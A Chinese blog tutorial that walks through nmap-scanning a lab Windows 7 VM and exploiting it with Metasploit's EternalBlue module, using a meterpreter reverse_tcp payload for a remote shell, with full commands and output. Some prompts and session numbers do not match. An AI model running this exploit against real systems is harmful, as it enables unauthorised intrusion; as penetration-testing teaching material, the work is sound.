使用Metasploit(msf)通過ms17_010_eternalblue漏洞控制Windows電腦
阿新 • • 發佈:2019-02-19
首先給大家介紹一下兩樣東西:
大家要清楚一點,擅自攻擊別人電腦是違法行為。
然後開始講解本次的主題。。。。
首先開啟Kali(一個著名的滲透測試專用的Linux系統,滲透測試必須的工具)。
然後開啟應用程式-漏洞利用工具集-metasploit。
成功後顯示如下:
[i] Database already started
[i] The database appears to be already configured, skipping initialization
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: 直接利用nmap對10.0.3.65主機進行埠掃描:
msf > nmap -sV -Pn -p1-65535 -O -v 10.0.3.65結果如下:
TCP/IP fingerprinting (for OS scan) requires root privileges.
QUITTING!
YoussefdeMacBook-Pro:~ youssef$ sudo nmap -sV -Pn -p1-65535 -O -v 10.0.3.65
Password:
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-07 10:56 CST
NSE: Loaded 43 scripts for scanning.
Initiating ARP Ping Scan at 10:56
Scanning 10.0.3.65 [1 port]
Completed ARP Ping Scan at 10:56, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:56
Completed Parallel DNS resolution of 1 host. at 10:56, 0.01s elapsed
Initiating SYN Stealth Scan at 10:56
Scanning 10.0.3.65 [65535 ports]
Discovered open port 139/tcp on 10.0.3.65
Discovered open port 135/tcp on 10.0.3.65
Discovered open port 3389/tcp on 10.0.3.65
Discovered open port 445/tcp on 10.0.3.65
Discovered open port 49153/tcp on 10.0.3.65
Discovered open port 49157/tcp on 10.0.3.65
Discovered open port 49152/tcp on 10.0.3.65
Discovered open port 49155/tcp on 10.0.3.65
Discovered open port 49154/tcp on 10.0.3.65
Discovered open port 49156/tcp on 10.0.3.65
Discovered open port 1688/tcp on 10.0.3.65
Completed SYN Stealth Scan at 10:57, 37.66s elapsed (65535 total ports)
Initiating Service scan at 10:57
Scanning 11 services on 10.0.3.65
Service scan Timing: About 36.36% done; ETC: 10:59 (0:01:35 remaining)
Completed Service scan at 10:58, 81.47s elapsed (11 services on 1 host)
Initiating OS detection (try #1) against 10.0.3.65
NSE: Script scanning 10.0.3.65.
Initiating NSE at 10:58
Completed NSE at 10:58, 0.04s elapsed
Initiating NSE at 10:58
Completed NSE at 10:58, 0.04s elapsed
Nmap scan report for 10.0.3.65
Host is up (0.0039s latency).
Not shown: 65524 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
1688/tcp open msrpc Microsoft Windows RPC
3389/tcp open ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
MAC Address: 2C:6E:85:8D:C8:C7 (Intel Corporate)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Uptime guess: 0.311 days (since Tue Aug 7 03:30:19 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: WIN-EEGC1ODGIOU; OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.04 seconds
Raw packets sent: 66869 (2.943MB) | Rcvd: 65555 (2.623MB)發現該主機是Windows7系統,並且開放了445埠,那麼就有極大概率可以利用ms17_010_eternalblue漏洞了。如果發現主機不是win7或者沒有開放該埠,那麼本次實驗就到此為止。。(꒪ꇴ꒪(꒪ꇴ꒪ ;)哈?
接下來,首先利用改漏洞,輸入:
msf > use exploit/windows/smb/ms17_010_eternalblue //使用ms17_010_eternalblue漏洞
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.0.3.65
rhost => 10.0.3.65 //設定攻擊目標
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp //使用meterpreter,這個是好東西,可以提供很多有意思的功能,不設定也可以,不設定的話就是直接獲取到windows的cmd
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > run //開始攻擊顯示結果如下:
[*] Started reverse TCP handler on 10.0.3.215:4444
[*] 10.0.3.65:445 - Connecting to target for exploitation.
[+] 10.0.3.65:445 - Connection established for exploitation.
[+] 10.0.3.65:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.0.3.65:445 - CORE raw buffer dump (42 bytes)
[*] 10.0.3.65:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.0.3.65:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.0.3.65:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.0.3.65:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.0.3.65:445 - Trying exploit with 17 Groom Allocations.
[*] 10.0.3.65:445 - Sending all but last fragment of exploit packet
[*] 10.0.3.65:445 - Starting non-paged pool grooming
[+] 10.0.3.65:445 - Sending SMBv2 buffers
[+] 10.0.3.65:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.0.3.65:445 - Sending final SMBv2 buffers.
[*] 10.0.3.65:445 - Sending last fragment of exploit packet!
[*] 10.0.3.65:445 - Receiving response from exploit packet
[+] 10.0.3.65:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.0.3.65:445 - Sending egg to corrupted connection.
[*] 10.0.3.65:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 10.0.3.65
[*] Meterpreter session 3 opened (10.0.3.215:4444 -> 10.0.3.65:49162) at 2018-08-07 11:41:05 +0800
[+] 10.0.3.65:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.3.65:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.3.65:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >檢視系統資訊sysinfo:
meterpreter > sysinfo
Computer : WIN-EEGC1ODGIOU
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 0
Meterpreter : x64/windows獲取命令列shell:
meterpreter > shell
Process 2772 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7601]
版權所有 (c) 2009 Microsoft Corporation。保留所有權利。
C:\Windows\system32>
C:\Windows\system32>systeminfo
systeminfo
主機名: WIN-EEGC1ODGIOU
OS 名稱: Microsoft Windows 7 專業版
OS 版本: 6.1.7601 Service Pack 1 Build 7601
OS 製造商: Microsoft Corporation
OS 配置: 獨立工作站
OS 構件型別: Multiprocessor Free
註冊的所有人: Windows 使用者
註冊的組織:
產品 ID: 00371-OEM-8992671-00524
初始安裝日期: 2017/8/25, 16:31:04
系統啟動時間: 2018/8/7, 11:59:41
系統製造商: VMware, Inc.
系統型號: VMware Virtual Platform
系統型別: x64-based PC
處理器: 安裝了 1 個處理器。
[01]: Intel64 Family 6 Model 61 Stepping 4 GenuineIntel ~1995 Mhz
BIOS 版本: Phoenix Technologies LTD 6.00, 2017/5/19
Windows 目錄: C:\Windows
系統目錄: C:\Windows\system32
啟動裝置: \Device\HarddiskVolume1
系統區域設定: zh-cn;中文(中國)
輸入法區域設定: zh-cn;中文(中國)
時區: (UTC+08:00)北京,重慶,香港特別行政區,烏魯木齊
實體記憶體總量: 2,047 MB
可用的實體記憶體: 1,542 MB
虛擬記憶體: 最大值: 4,095 MB
虛擬記憶體: 可用: 3,569 MB
虛擬記憶體: 使用中: 526 MB
頁面檔案位置: C:\pagefile.sys
域: WORKGROUP
登入伺服器: 暫缺
修補程式: 安裝了 1 個修補程式。
[01]: KB976902
網絡卡: 安裝了 1 個 NIC。
[01]: Intel(R) PRO/1000 MT Network Connection
連線名: 本地連線
啟用 DHCP: 是
DHCP 伺服器: 10.0.3.1
IP 地址
[01]: 10.0.3.65
[02]: fe80::dec:dc90:295b:668c
C:\Windows\system32>退出:
C:\Windows\system32>exit
exit
meterpreter >
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 10.0.3.65 - Meterpreter session 5 closed. Reason: User exit
msf exploit(windows/smb/ms17_010_eternalblue) > 具體的一些命令請參考這篇文章: